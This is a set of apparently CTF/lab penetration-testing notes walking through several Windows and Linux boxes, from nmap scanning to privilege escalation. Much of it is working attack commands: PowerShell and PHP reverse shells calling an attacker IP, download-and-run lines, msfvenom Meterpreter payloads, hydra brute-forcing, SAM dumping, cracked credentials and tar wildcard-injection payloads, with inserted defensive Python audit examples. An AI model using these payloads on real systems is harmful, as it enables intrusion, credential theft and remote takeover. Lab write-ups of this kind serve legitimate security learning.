Owner 侯智晟 meowheckerouo@gamil.com
[TOC]
---
# 0x04 Windows - /Rejetto HTTP File Server (HFS) RCE/Excessive Binary Permission/Unquoted Service PATH/
## Reconnaissance
nmap Script
```
#!/bin/sh
echo "
##################################################
# #
# MeowHecker is a cat. #
# #
##################################################
"
TARGET_IP=10.10.183.61;
echo "HOST Discover";
# host discovery only (-sn) via TCP SYN ping (-PS); the original '-RP' is not a valid nmap option
nmap -PS -sn --reason -T4 $TARGET_IP;
echo "----------------------------------------------------------------------------------------------------";
echo "Scanning Common Port";
# keep lines starting with '<port>/tcp' or '<port>/udp', take the port number and comma-join it for -p
TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ",");
echo "Default (top 1000 ports): $TARGET_OPEN_PORTS";
echo "----------------------------------------------------------------------------------------------------";
echo "Identifying Services & Operating System & NSE Scanning";
nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oN ./$TARGET_IP.nmap;
echo "----------------------------------------------------------------------------------------------------";
echo "Starting ALL Port Scanning in background!";
sleep 20;
# '&;' is a syntax error in sh; a bare '&' backgrounds the full scan
nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &
```
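The awk | cut | paste pipeline in the script above collects every port line nmap prints, including closed or filtered ones, and feeds all of them to the service scan. The Python below is an added example, not part of the original notes, that parses nmap's normal (-oN) output the same way but keeps only the states you ask for; the nmap output embedded in it is constructed, not a real scan.

```python
import re

# Constructed sample of nmap normal (-oN) output; not from a real target.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated as: nmap -sS -Pn -T4 -oN scan.nmap 192.0.2.10
Nmap scan report for 192.0.2.10
Host is up (0.040s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE         SERVICE
80/tcp   open          http
135/tcp  open          msrpc
445/tcp  open          microsoft-ds
8080/tcp open          http-proxy
9999/tcp filtered      abyss
161/udp  open|filtered snmp
# Nmap done -- 1 IP address (1 host up) scanned in 3.21 seconds
"""

# Same shape the script's awk pattern looks for: '<port>/<proto>' at line start,
# followed by the state and service columns.
PORT_LINE = re.compile(r"^\s*(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_ports(nmap_output, states=("open",)):
    """Return [(port, proto, state, service)] for port lines whose state is in `states`.

    The awk | cut | paste pipeline prints every matching line regardless of
    state, so 'filtered' and 'closed' ports end up in the -p list of the
    follow-up service scan; selecting on state avoids that.
    """
    found = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) in states:
            port, proto, state, service = m.groups()
            found.append((int(port), proto, state, service))
    return found


def port_spec(nmap_output, proto="tcp", states=("open",)):
    """Build the comma-separated value for nmap -p, e.g. '80,135,445,8080'."""
    ports = sorted(p for p, pr, _, _ in parse_ports(nmap_output, states) if pr == proto)
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    for entry in parse_ports(SAMPLE_NMAP_OUTPUT, states=("open", "filtered", "open|filtered")):
        print(entry)
    print("-p", port_spec(SAMPLE_NMAP_OUTPUT))
```

Reading the scan from a file and passing `port_spec(...)` to the `-p` of the second nmap run gives the same result as the shell pipeline, minus the ports that were never open.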
### Identifying Host Status

### Probing Common Ports

### Identifying Services & Operating System & NSE Scanning


### Thorough Port Scanning (0~65535)

### Information Disclosure

Potential User -> Hill Harper
## Discovery & Analysis of New Attack Surface
### Web Services
### Port 80
```
/
/img
```
### Port 8080
Directory Exposure
```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://$TARGET_IP:8080
```
No result

-> login
-> Home
-> Search
### SMB Service
```
TARGET_IP=10.10.183.61;
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $TARGET_IP
```

No result
## Identifying Vulnerability
### Searching for public vulnerabilities
The web service has a public vulnerability!

Analysing the attack script

It looks like a template injection attack.
Core concept:
```
http://10.10.183.61:8080/?search=%00{.+exec|whoami.}
```
Try another, better exploit (success)


Analysing the exploit program

Start the HTTP server that serves /nc.exe

## Exploitation
### Initial Access
Run the exploit !

Obtain Initial Access
## Post-Exploitation

```
powershell -c "Invoke-WebRequest -uri 10.4.42.63:53/PowerUp.ps1 -outfile ./PowerUp.ps1"
```
<!-- powershell -c "Invoke-WebRequest -uri 10.4.42.63:53/nc64.exe -outfile ./nc64.exe"
nc64.exe -e cmd 10.4.42.63 4444 -->

### PowerUp.ps1 Scanning
Cmd TO Powershell!
```
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.4.42.63', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush() }; $client.Close()"
```
Run the script
```
. ./PowerUp.ps1
Invoke-AllChecks
```
Generate reverse shell (service)
```
powershell -c "Invoke-WebRequest -uri 10.4.42.63:53/Program.exe -outfile ./Program.exe"
```
### Bill password

### Excessive Binary Permission (FAIL)
```
copy Program.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\"
icacls ASCService.exe
icacls ASCService.exe /grant bill:F
```
```
Program C:\Program Files (x86)\IObit\Advanced SystemCare ASCService.exe
```


### Unquoted Service Path (Works)
Requirements:
- CanRestart
- Start Name
- Path permission

Check the unquoted PATH

This PATH is writable!

```
icacls Program.exe /grant USER_NAME:F
```


```
sc.exe stop AdvancedSystemCareService9
sc.exe start AdvancedSystemCareService9
```
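The unquoted-path condition above comes from how Windows resolves a service ImagePath that contains spaces but no quotes. The Python below is an added audit example, not PowerUp and not part of the original notes: for a given ImagePath it lists every file name CreateProcess would try before the intended binary, and the directories whose write ACLs therefore need checking. The service table is constructed, except for the IObit path, which is the one reported in this section.

```python
import ntpath

# Constructed service table; the IObit entry is the path reported in this section.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor Name\svc.exe" -k netsvcs',
    "NoSpaces": r"C:\Windows\System32\svchost.exe -k netsvcs",
}


def unquoted_path_candidates(image_path):
    """Return (is_unquoted, candidates).

    For an unquoted ImagePath with spaces, CreateProcess tries each
    space-delimited prefix with '.exe' appended and runs the first file that
    exists, so 'C:\\Program Files\\A B\\svc.exe' is looked up as
    'C:\\Program.exe', 'C:\\Program Files\\A.exe', then the real binary.
    A quoted path, or one without spaces, resolves only to itself.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return False, [path.split('"')[1]]
    tokens = path.split(" ")
    # Tokens after the executable are command-line arguments, not part of the lookup.
    exe_index = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")),
                     len(tokens) - 1)
    tokens = tokens[: exe_index + 1]
    if len(tokens) == 1:
        return False, [tokens[0]]
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return True, candidates


def audit_services(services):
    """services: {name: ImagePath}. For each unquoted, space-containing path,
    return the directories a lower-privileged user must not be able to write
    to; the last candidate is the intended binary, the earlier ones are the
    names Windows tries first."""
    findings = {}
    for name, image_path in services.items():
        unquoted, candidates = unquoted_path_candidates(image_path)
        if unquoted:
            findings[name] = sorted({ntpath.dirname(c) for c in candidates[:-1]})
    return findings


if __name__ == "__main__":
    for svc, dirs in audit_services(SAMPLE_SERVICES).items():
        print(svc, "-> verify write ACLs on:", dirs)
```

The fix on the defending side is the one PowerUp's output implies: quote the ImagePath in the service's registry entry and make sure no directory on the path grants write or create-file rights to non-administrators.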

# 0x05 Windows - /Default Admin Credential/Template Injection to RCE/SeDebugPrivilege, SeImpersonatePrivilege
## Reconnaissance
```
#!/bin/sh
echo "
##################################################
# #
# MeowHecker is a cat. #
# #
##################################################
"
TARGET_IP=10.10.129.40;
echo "HOST Discover";
# host discovery only (-sn) via TCP SYN ping (-PS); the original '-RP' is not a valid nmap option
nmap -PS -sn --reason -T4 $TARGET_IP;
echo "----------------------------------------------------------------------------------------------------";
echo "Scanning Common Port";
TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ",");
echo "Default (top 1000 ports): $TARGET_OPEN_PORTS";
echo "----------------------------------------------------------------------------------------------------";
echo "Identifying Services & Operating System & NSE Scanning";
nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oN ./$TARGET_IP.nmap;
echo "----------------------------------------------------------------------------------------------------";
sleep 10;
echo "Starting ALL Port Scanning in background!";
# '&;' is a syntax error in sh; a bare '&' backgrounds the full scan
nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &
```
### Identifying Host Status

Host is up!
### Probing Common Ports

### Identifying Services & Operating System & NSE Scanning

### Thorough Port Scanning (0~65535)
### Information Disclosure
## Discovery & Analysis of New Attack Surface
### Web Services
#### Port 80

Directory Exposure
No directory accessible!
#### Port 8080


/assets

/error

/logout

Target Analysis

### Network Service
## Identifying Vulnerability
### Weak Authentication
Login Panel
Weak authentication -> default credentials
admin:admin

We obtain the admin panel
## Exploitation
Find a way to upload a web shell or run a command that connects back to our machine

Reverse PowerShell
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
```powershell=
powershell iex (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:PORT/Binary');Invoke-PowerShellTcp -Reverse -IPAddress 10.4.42.63 -Port 443
```


## Post-Exploitation
### Privilege Escalation
#### PowerUp.ps1 (Fail)
```
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/PowerUp.ps1','PowerUp.ps1')"
```
```
. ./PowerUp.ps1
Invoke-AllChecks
```

#### Switching the shell to Meterpreter
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev_mete_shell.exe
```
```
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0 ; set LPORT 80; run"
```
```
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/rev_mete_shell.exe','rev_mete_shell.exe')"
```

### Abuse Privilege
```
whoami /priv
```

Save the SAM and SYSTEM hives to the user folder
```
reg save hklm\sam C:\Users\bruce\sam.hive
reg save hklm\system C:\Users\bruce\system.hive
```

Because the target has no Python, use Meterpreter instead!

SAM hashdump

### Crack Hash
```
john -format=NT --wordlist=rockyou.txt WINDOW_HASH.txt
```

Fail
### SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege (FAIL)
```
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/RogueWinRM.exe','RogueWinRM.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/nc32.exe','nc32.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/nc64.exe','nc64.exe')"
```
```
./RogueWinRM.exe -p "./nc32.exe" -a "-e cmd.exe 10.4.42.63 4444"
```

### SeDebugPrivilege, SeImpersonatePrivilege
Require:
Meterpreter
#### Load Module
```
load incognito
```

To check which tokens are available,
```
list_tokens -g
```

Use Token
```
impersonate_token "BUILTIN\Administrators"
```
Migrate Meterpreter to an admin process

```
migrate ADMIN_PROCESS
```


# 0x06 Windows - /Web Brute Force Login/Path Traversal & Upload Shell (RCE)/Scheduled Task
## Reconnaissance
```
#!/bin/sh
echo "
##################################################
# #
# MeowHecker is a cat. #
# #
##################################################
"
TARGET_IP=10.10.41.190;
echo "HOST Discover";
# host discovery only (-sn) via TCP SYN ping (-PS); the original '-RP' is not a valid nmap option
nmap -PS -sn --reason -T4 $TARGET_IP;
echo "----------------------------------------------------------------------------------------------------";
echo "Scanning Common Port";
TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ",");
echo "Default (top 1000 ports): $TARGET_OPEN_PORTS";
echo "----------------------------------------------------------------------------------------------------";
echo "Identifying Services & Operating System & NSE Scanning";
nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oN ./$TARGET_IP.nmap;
echo "----------------------------------------------------------------------------------------------------";
sleep 10
echo "Starting ALL Port Scanning in background";
# '&;' is a syntax error in sh; a bare '&' backgrounds the full scan
nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &
```
### Identifying Host Status

Host is up
### Probing Common Ports

### Identifying Services & Operating System & NSE Scanning

### Thorough Port Scanning (0~65535)

## Discovery & Analysis of New Attack Surface
### Web Services
Directory Enumeration

Site Map

Information disclosure

### Network Service
## Identifying Vulnerability
### Searching for public vulnerabilities


Analysing the exploit script
-> Directory traversal + upload web shell
It seems to require authentication to upload the shell!

Upload Function

Shell Script


### Manual Testing
#### Authentication
Default Credential
admin / admin

/Account/login.aspx

/Account/password-retrieval.aspx



```
admin
ADMIN
```
Weak authentication mechanism!
```
hydra -l "admin" -P rockyou.txt 10.10.41.190 http-post-form "/Account/login.aspx:__VIEWSTATE=KWC25fG61cg5gTrz%2BbqQqQOa8LS4QYOnFQJzqXBZClc8W9%2FeZPQOT2CAEHJwvrvsfQcNR2jljSXSexhxw37RisOHhVLKIuyuxiv0N6X%2BZu0p%2FcO9NAO37TaiwTKr56aPrl7c93%2F5RwqUJxi%2FcHXyOpikgZcoH%2FZMgT%2FVhTB9bPd7YIe4&__EVENTVALIDATION=XWWQT%2B1JCSNG2w3vwcVK%2FtdMO7dbrI64dv2IUBHX%2BpTrmWEpSlIoBnTUSsYzQeLpJsevsGGLKE8b9jsdkmGczmXxajojgLfWMYzkhvMO4H0HT8tKuq1roy1QGDsEwJTeets4xQ2d1CaGtnlkuf80RKYY9PD2Dws1GcRvNJ9xTHNo2mZm&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%85%A5"
```

## Exploitation
RCE !
```
python3 47011.py -u admin -p 1qaz2wsx -t 10.10.41.190 -l 10.4.42.63:443
```

## Post-Exploitation
### PowerUp.ps1
```
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/PowerUp.ps1','PowerUp.ps1')"
```
### Privilege! (FAIL)

```
whoami /priv
```

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev_mete_shell.exe
```
```
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/rev_mete_shell.exe','rev_mete_shell.exe')"
```

### Admin Credential (FAIL)

```
administrator
4q6XvFES7Fdxs
```
```
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.219.174 /u:administrator /p:'4q6XvFES7Fdxs!'
rdesktop -u administrator -p 4q6XvFES7Fdxs! 10.10.219.174
```
### winPEAS
https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
```
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.42.63:53/winPEASx64.exe','winPEASx64.exe')"
```
SystemInfo

### Scheduled Task -> allows us to modify the binary!!
Service information

Find a binary that lets us run with administrator rights
### Search the schedule log



Message.exe allows modification
Replace Message.exe with a malicious reverse shell


Solved!
# 0x07 Ubuntu - /SQLi - sqlmap/Local Port Forwarding/Webmin (CMS) - RCE (admin)
## Reconnaissance
### Identifying Host Status

### Probing Common Ports

### Identifying Services & Operating System & NSE Scanning

### Thorough Port Scanning (0~65535)

### Interesting Information
None
## Discovery & Analysis Attack Surface
**Web**
0x01 Identify WebService Technique
- Language: PHP
- FrameWork: ?
- Version: ?
0x02 Exists Known Vulnerability ?
Unknown
0x03 Start Burp Scanner & crawl the website
0x04 Exists Specialised web Scanner ?
0x05 SiteMap
### Network Service
## Identifying Vulnerability
### Manual Testing - Web
Following the list
https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
/Login Page

SQLi testing
```
'SELECT SLEEP(20) -- meowhecker
```
UserName
```
' or 1=1 -- meowPadding (Work)
```
Redirects to
http://10.10.238.118/portal.php

search -> 123'

SQLi Detection
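Why `' or 1=1 -- ` in the username field lands on portal.php, and what the fix looks like, as an added example that is not the target application's code: a login check built by string concatenation beside a parameterised one, run against an in-memory SQLite table with a constructed user. SQLite has no SLEEP(), so the time-based probe above is MySQL-specific and is not reproduced here.

```python
import hashlib
import sqlite3

# The payload typed into the username field above.
PAYLOAD = "' or 1=1 -- meowPadding"


def make_db():
    """In-memory user table with one constructed account (password stored as
    SHA-256, matching the hash | username dump shape seen in this write-up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("alice", hashlib.sha256(b"correct horse").hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by string concatenation. A quote in the username ends the
    literal early, 'or 1=1' makes the WHERE clause true for every row, and
    '-- ' comments out the password check."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password_hash = '" + pw_hash + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values out of band, so quotes
    and comment markers inside them are ordinary characters, never SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload       ->", login_vulnerable(db, PAYLOAD, "anything"))
    print("parameterised, payload    ->", login_safe(db, PAYLOAD, "anything"))
    print("parameterised, real creds ->", login_safe(db, "alice", "correct horse"))
```

The same concatenation pattern is what sqlmap later drives to dump the table; the parameterised version leaves it nothing to inject into.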
## Exploitation
Use sqlmap to exploit the SQLi vulnerability
Dump the vulnerable page request


```
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47
```

Password
```
videogamer124
```
### Attempt login as Agent 47 via SSH
```
ssh agent47@$TARGET_IP
```

## Post-Exploitation
Investigate Socket
```
ss -tulpn
```

Forward the internal service to our machine
```
ssh -L 10000:localhost:10000 agent47@$TARGET_IP
```



CMS NAME -> Webmin Version 1.580
**Privilege Escalation**
### Exploit kernel (FAIL)

### CMS - Webmin (1.580) (Success)


Fail
Attempt another exploit


# 0x07 SMB Information Leak/Brute Force Login Website/Directory Brute Force - Hidden Page/CMS - Remote File Include (RCE)/Cron Jobs Wildcard Injection.
## Reconnaissance
```
#!/bin/sh
echo "
##################################################
# #
# MeowHecker is a cat. #
# #
##################################################
"
ATTACKER_IP=10.4.42.63;
TARGET_IP=10.10.49.83;
echo "HOST Discover";
# host discovery only (-sn) via TCP SYN ping (-PS); the original '-RP' is not a valid nmap option
nmap -PS -sn --reason -T4 $TARGET_IP;
echo "----------------------------------------------------------------------------------------------------";
echo "Scanning Common Port";
TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ",");
echo "Default (top 1000 ports): $TARGET_OPEN_PORTS";
echo "----------------------------------------------------------------------------------------------------";
echo "Identifying Services & Operating System & NSE Scanning";
nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oX ./$TARGET_IP.Xmap; #searchsploit --name $TARGET_IP.Xmap
echo "----------------------------------------------------------------------------------------------------";
sleep 10
echo "Starting ALL Port Scanning in background";
# '&;' is a syntax error in sh; a bare '&' backgrounds the full scan
nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &
# match the XML service scan against Exploit-DB while the full scan runs
searchsploit --nmap $TARGET_IP.Xmap;
```
### Identifying Host Status

### Probing Common Ports

### Identifying Services & Operating System & NSE Scanning


### Thorough Port Scanning (0~65535)

### Interesting Information
None
## Discovery & Analysis Attack Surface
**Web**
0x01 Identify WebService Technique
- Language: php
- Application Name & Version
- SquirrelMail - 1.4.23
- Cuppa(CMS)
0x02 Exists Known Vulnerability ?

(Not working!)
Requires username & password!
CMS Cuppa
Remote file inclusion exists!

0x03 Exists Specialised web Scanner ?
Unknown
0x04 Start Burp Scanner
0x05 Directory Brute-force

0x06 SiteMap
### POP3 110
```
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 $TARGET_IP
```
Brute-force login
Attempt username -> miles
```
hydra -l miles -P rockyou.txt -f $TARGET_IP pop3 -V
```
Nothing interesting

### IMAP 143
Nothing interesting
### SMB Server
List the SMB share folder
```
smbclient --no-pass -L //$TARGET_IP
```

Connect to Share folder
```
smbclient --no-pass //$TARGET_IP/anonymous
```

"A recent system failure caused various passwords to be changed. All Skynet employees must change their password after reading this." -- Miles Dyson
-> info -> weak password?
-> Username: milesdyson

milesdyson
## Identifying Vulnerability
**Web**
Following the list
https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
Brute-force login attempt
Parameter
```
login_username=mewo&secretkey=mewo&js_autodetect_results=1&just_logged_in=1
```
ERROR
```
hydra -l "milesdyson" -P log1.txt $TARGET_IP http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
```

User:milesdyson
Password:cyborg007haloterminator

SMB UserName / Password
milesdyson
)s{A&2Z=F^n_E.B`
**Login to the SMB server**
```
smbclient -U milesdyson //$TARGET_IP/milesdyson
```
Download sensitive info

The page looks like it is still under development
```
/45kra24zxs28v3yd
```
Expose the hidden directory
```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://$TARGET_IP/45kra24zxs28v3yd:80
```

CMS: Cuppa
Attempt a public exploit

## Exploitation
Exploit the remote file include to get RCE

PHP shell
```
<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.4.42.63 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```
```
/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.42.63:53/PHPreverShell.php
```
### Obtain the initial Shell


## Post-Exploitation
**Shell Stabilization**

**Privilege Escalation**
```
echo "mkfifo /tmp/f; nc 10.4.42.63 443 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f" > /home/milesdyson/backups/backup.sh
```
**Running LinPEAS**

**Checking crontab Configuration**
`cat /etc/crontab`




### Wildcard Parameter Injection
```
echo '#!/bin/bash' > shell.sh
echo '/bin/bash' >> shell.sh
echo "meow1" > "--checkpoint=1"
echo "meow1" > "--checkpoint-action=exec=sh ./shell.sh"
```
Another way
```
printf '#!/bin/bash\nchmod +s /bin/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
```
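The `--checkpoint-action` file names above only matter when a privileged cron job runs tar with a shell glob inside a directory that a lower-privileged user can write to. The Python below is an added example, not part of the original notes, that audits a system crontab for exactly that shape and for root jobs whose script itself lives in a writable directory (the backup.sh case from this section). The crontab text and the set of writable directories are constructed; on a live host the latter comes from checking the directory permissions.

```python
import os
import re
import shlex

# Constructed system crontab; the backup.sh path is the one from this section.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
0 3     * * *   root    cd /var/www/html && tar cf /home/backup.tgz *
0 4     * * *   root    tar cf /root/etc.tgz /etc
30 2    * * *   backup  cd /srv/uploads && tar czf /srv/arch.tgz *
"""

# Programs whose option parsing lets a file name that starts with '--' act as
# an option once the shell has expanded '*' into a list of file names.
GLOB_SENSITIVE = {"tar", "rsync", "chown", "chmod", "zip", "7z"}


def parse_crontab(text):
    """Yield (user, command) for each job line of a system crontab
    (minute hour dom month dow user command)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # malformed line
        yield fields[5], fields[6]


def _segments(command):
    """Split a shell command on &&, ; and || into argv lists."""
    for segment in re.split(r"&&|;|\|\|", command):
        try:
            argv = shlex.split(segment)
        except ValueError:
            return
        if argv:
            yield argv


def wildcard_risk(command):
    """Return the directory in which a glob-sensitive program expands '*',
    or None. Tracks the common 'cd DIR && PROG ... *' shape."""
    cwd = "/"
    for argv in _segments(command):
        if argv[0] == "cd" and len(argv) > 1:
            cwd = argv[1]
            continue
        prog = os.path.basename(argv[0])
        if prog in GLOB_SENSITIVE and any("*" in a for a in argv[1:]):
            return cwd
    return None


def job_program_dir(command):
    """Directory of the first program the job runs ('' for a bare name)."""
    for argv in _segments(command):
        return os.path.dirname(argv[0])
    return ""


def audit_crontab(text, writable_dirs):
    """Report root jobs that expand '*' inside a writable directory, or whose
    script itself lives in one. `writable_dirs` is constructed here; on a
    live host it comes from checking the directory permissions."""
    findings = []
    for user, command in parse_crontab(text):
        if user != "root":
            continue
        glob_dir = wildcard_risk(command)
        if glob_dir in writable_dirs:
            findings.append((command, "glob expanded in writable " + glob_dir))
            continue
        prog_dir = job_program_dir(command)
        if prog_dir in writable_dirs:
            findings.append((command, "script lives in writable " + prog_dir))
    return findings


if __name__ == "__main__":
    writable = {"/var/www/html", "/home/milesdyson/backups", "/srv/uploads"}
    for command, reason in audit_crontab(SAMPLE_CRONTAB, writable):
        print(f"{reason}: {command}")
```

Scripts that cron runs (backup.sh here) must be read as well, since the tar wildcard in this box sits inside the script rather than on the crontab line; the remedy in both places is to pass explicit paths or `--` before the file list and to keep the directory and the script owned by root and not group- or world-writable.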

**Check SUID permission**

No Result
**Check cap_setuid**

No Result
# 0x08 CentOS - /SQLi - Joomla (CMS)/Joomla Panel to RCE/Sudo - yum
## Reconnaissance
### NMAP-Scanning
```
#!/bin/sh
echo "
##################################################
# #
# MeowHecker is a cat. #
# #
##################################################
"
ATTACKER_IP=10.4.42.63;
TARGET_IP=10.10.70.73;
echo "HOST Discover";
# host discovery only (-sn) via TCP SYN ping (-PS); the original '-RP' is not a valid nmap option
nmap -PS -sn --reason -T4 $TARGET_IP;
echo "----------------------------------------------------------------------------------------------------";
echo "Scanning Common Port";
TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 $TARGET_IP | awk '/^ *[0-9]+\/(tcp|udp)/ {print $1}' | cut -d "/" -f 1 | paste -sd ",");
echo "Default (top 1000 ports): $TARGET_OPEN_PORTS";
echo "----------------------------------------------------------------------------------------------------";
echo "Identifying Services & Operating System & NSE Scanning";
nmap -sT -Pn -p $TARGET_OPEN_PORTS -sV -O -sC -T4 $TARGET_IP -oX ./$TARGET_IP.Xmap; #searchsploit --name $TARGET_IP.Xmap
echo "----------------------------------------------------------------------------------------------------";
sleep 10
echo "Starting ALL Port Scanning in background";
# '&;' is a syntax error in sh; a bare '&' backgrounds the full scan
nmap -sS -Pn -p- -T4 $TARGET_IP -oN PortScan0~65535$TARGET_IP.nmap &
# match the XML service scan against Exploit-DB while the full scan runs
searchsploit --nmap $TARGET_IP.Xmap;
```
**Host is UP ?**

Yes/NO: Yes
**Probing Common Ports**

**Identifying Services & Operating System & NSE Scanning**

**Thorough Port Scanning (0~65535)**
## Discovery & Analysis Attack Surface
**Web**
0x01 Identify WebService Technique

- Language: PHP
- Application Name & Version
- Joomla : 3.7.0
0x02 Exists Known Vulnerability?
Yes/NO: Yes
SQLI

0x03 Exists Specialized web Scanner?
Yes/NO: Yes
https://www.kali.org/tools/joomscan/
https://github.com/drego85/JoomlaScan
Run Scanner
Tool 1
```
python2 joomlascan.py -u http://10.10.249.47/ -t 10
```
Admin Component

Component information

Tool 2
```
# the Kali package and binary are named joomscan (https://www.kali.org/tools/joomscan/)
apt install joomscan
joomscan -u http://10.10.249.47/
```
Joomla 3.7.0



0x04 Curl the website & Directory Brute-force
0x05 SiteMap
0x06 Analysis Target & interesting Things?
**Network Service**
## Identifying Vulnerability
**Web**
Following the list
https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
Analyse the public exploit

## Exploitation
SQLi - sqlmap

```
sqlmap -u "http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```

Exploit tool 2 - SQLi exploit
Run joomblah.py to exploit the SQL injection vulnerability


We obtain
admin user: jonah
Password hash: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
### Hash Crack

$2 -> looks like bcrypt
```
john -format=bcrypt --wordlist=rockyou.txt passwordHash.txt
```

```
spiderman123
```
Website login
http://10.10.249.47/administrator/
jonah
spiderman123

Upload PHP reverse Shell
```
